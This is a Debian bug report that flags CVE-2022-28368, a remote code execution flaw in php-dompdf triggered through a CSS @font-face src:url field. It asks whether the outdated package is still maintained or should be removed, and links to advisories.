Source: php-dompdf Version: 0.6.2+dfsg-3.1 Severity: grave Tags: security upstream Forwarded: https://github.com/dompdf/dompdf/issues/2598 X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>
Hi, The following vulnerability was published for php-dompdf. I raise this as grave to ask the following question as well from future inclusion in bookworm: Is php-dompdf still maintained? I notice that it's at version 0.6.2 since stretch with one single NMU from the reproducible builds team. Or should it be removed from Debian? CVE-2022-28368[0]: | Dompdf 1.2.1 allows remote code execution via a .php file in the | src:url field of an @font-face Cascading Style Sheets (CSS) statement | (within an HTML input file). If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2022-28368 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28368 [1] https://snyk.io/blog/security-alert-php-pdf-library-dompdf-rce/ [2] https://positive.security/blog/dompdf-rce [3] https://github.com/dompdf/dompdf/issues/2598 Regards, Salvatore
